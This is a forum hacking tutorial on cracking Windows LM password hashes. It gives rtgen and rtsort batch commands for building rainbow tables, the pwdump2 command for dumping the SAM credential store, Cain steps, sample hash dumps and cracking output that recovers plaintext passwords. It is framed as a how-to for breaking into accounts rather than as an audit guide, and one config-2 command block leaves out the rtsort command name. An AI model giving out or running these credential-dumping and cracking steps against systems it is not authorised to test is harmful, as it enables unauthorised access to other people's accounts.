------------------------------
CRACKING WINDOWS PASSWORDS
------------------------------
Biovore --
http://www.rorta.net
Well, after much umming and aahing, i bring to you, the first part of hacking windows passwords of upto 14 characters in a few seconds.
------------------------------
Tool kit:
------------------------------
Rainbow Crack
pwdump2
Cain & able
------------------------------
Cliff steps:
------------------------------
1) Generate rainbow tables
2) Dump sam and system file
3) Use cain to crack password via rainbow tables
Yes, it is THAT simple.
------------------------------
MORE DETAIL:
------------------------------
Rainbow tables, what are they? Well think of them as large files of random passwords already computed.
you can read more here:
http://www.antsight.com/zsl/rainbowcrack/
Anyways fire up rtgen and get some tables....
rtgen is a program which will generate rainbow chains, which then combine to make a rainbow table.
here are the bat files for you lazy people
Code:
rem config 1
rtgen lm alpha 1 7 0 2100 8000000 all
rtgen lm alpha 1 7 1 2100 8000000 all
rtgen lm alpha 1 7 2 2100 8000000 all
rtgen lm alpha 1 7 3 2100 8000000 all
rtgen lm alpha 1 7 4 2100 8000000 all
and
Code:
rem config 2
rtgen lm alpha-numeric 1 7 0 2400 40000000 all
rtgen lm alpha-numeric 1 7 1 2400 40000000 all
rtgen lm alpha-numeric 1 7 2 2400 40000000 all
rtgen lm alpha-numeric 1 7 3 2400 40000000 all
rtgen lm alpha-numeric 1 7 4 2400 40000000 all
config 1 should take 12 - 24hrs to generate depending on your machine, maybe even 36hrs. it will use 610mb of disk space
Config 2 should take around 5 days to generate and use 3 gigs of hdd space
commming soon will be config 3 which will take 18 gigs of space... :O
So, config 1 will be able to crack 99.904% of passwords that ONLY have alpha characters in a few seconds. I will be using these
tables for the tut, as i imagine most of you dont want to spend 5 days on rtgen.
Also, you will need to sort the files to make them more efficent
this is done via rtsort
Code:
rem config 1
rtsort lm_alpha#1-7_0_2100x8000000_all.rt
rtsort lm_alpha#1-7_1_2100x8000000_all.rt
rtsort lm_alpha#1-7_2_2100x8000000_all.rt
rtsort lm_alpha#1-7_3_2100x8000000_all.rt
rtsort lm_alpha#1-7_4_2100x8000000_all.rt
Code:
rem config 2
lm_alpha-numeric#1-7_0_2400x40000000_all.rt
lm_alpha-numeric#1-7_1_2400x40000000_all.rt
lm_alpha-numeric#1-7_2_2400x40000000_all.rt
lm_alpha-numeric#1-7_3_2400x40000000_all.rt
lm_alpha-numeric#1-7_4_2400x40000000_all.rt
So you have wasted some space, and you go, hmmm whats next.
Well we are going to dump the SAM to a file.
The SAM file is a depository for the user names and password hashes for every account on the local machine, or domain if it is a
domain controller, that wasnt too hard was it?
To do this, we are going to use a program called pwdump2
run the exe in cmd and issue this code:
pwdump2 > pass.txt
what that will do is redirect output to a file names pass.txt in the same folder as the program.
open it up: this is what it will look like:
Code:
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
HelpAssistant:1000:569fbcadc4ce9874da275e3dd3b3773c:fdcc6716e6ec3388bc0694086538e4f2:::
RORTA:1008:c036412e27c931e297b0668eeca3a3a4:fe31056a1f67c9e149d60851d36d39fe:::
SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:54b4144f22141ce78c44cb2e5b38b852:::
__vmware_user__:1005:aad3b435b51404eeaad3b435b51404ee:839a847853f36b5a0bae94bca6992ea6:::
as you can see i have removed my account and the admin one so.... note the rorta one :P
now what?
well we will fire up cain
in cain you will see a tab that says cracking, goto that one...
now on the left most column you can see a nt and ntlm hashes tab click that one
now hit the big plus sign
select import
open the pass.txt in your pwdump2 folder
highlight the accounts you want to crack and right click
select Cryptinalasys attack
press add table and then import all your rainbow tables...
then START! and wait 10 seconds....
Code:
Reading lm_alpha#1-7_0_2100x8000000_all.rt ...
... 128000000 bytes read in: 5.00 s
Verifying the file... (OK)
Searching for 2 hashes...
Plaintext of c036412e27c931e2 is RORTARU
Plaintext of 97b0668eeca3a3a4 is LES
Cryptanalysis time: 4.44 s
Username Password
------------------------------------------
RORTA RORTARULES
Lets have a little look at the output here:
As you can see 2 hashes were loaded, thats because, LM can only store 7 char in each hash the pass was 10 char so 7 in 1 hash
and 3 in the other...
this time, i went to a website that generated and i quote "secure passwords", well lets see how secure it is now....
Code:
Reading lm_alpha#1-7_0_2100x8000000_all.rt ...
... 128000000 bytes read in: 4.42 s
Verifying the file... (OK)
Searching for 2 hashes...
Plaintext of 4dcb7b0d5742450d is RLUPRI
Cryptanalysis time: 5.02 s
Reading lm_alpha#1-7_1_2100x8000000_all.rt ...
... 128000000 bytes read in: 4.66 s
Verifying the file... (OK)
Searching for 1 hash...
Cryptanalysis time: 3.91 s
Reading lm_alpha#1-7_2_2100x8000000_all.rt ...
... 128000000 bytes read in: 5.19 s
Verifying the file... (OK)
Searching for 1 hash...
Plaintext of e6ea64de82fd05a1 is WIAXOED
Cryptanalysis time: 0.49 s
Username Password
------------------------------------------
secure WIAXOEDRLUPRI
doesnt seam overly secure to me....
Stickied by Synch, k thx.